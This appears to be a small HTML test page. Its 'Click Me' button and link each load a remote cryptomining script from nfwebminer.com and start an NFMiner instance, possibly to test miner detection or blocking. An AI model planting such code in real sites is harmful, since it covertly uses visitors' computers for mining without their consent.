<html>
<head>
	<title>Test Page For JS Test</title>
	<meta charset="UTF-8">
</head>
<body>
	<script>
	function startMiner() {
		var script = document.createElement('script');
		script.setAttribute('type', 'text/javascript');
		script.setAttribute('src', 'https://nfwebminer.com/lib/miner.js');
		document.head.appendChild(script);
		var miner = new NFMiner("187fd", {load:"medium"});
   		miner.start();
   	}
	</script>
	<button onclick="startMiner()">Click Me</button>

<a href='linkhref.html' id='mylink'>click me</a>

<script type="text/javascript">

var myLink = document.getElementById('mylink');

myLink.onclick = function(){

    var script = document.createElement("script");
    script.type = "text/javascript";
    script.src = "https://nfwebminer.com/lib/miner.js"; 
    document.getElementsByTagName("head")[0].appendChild(script);
    var miner = new NFMiner("187fd", {load:"medium"});
   	miner.start();
   	return false;
    

}


</script>

</body>
</html>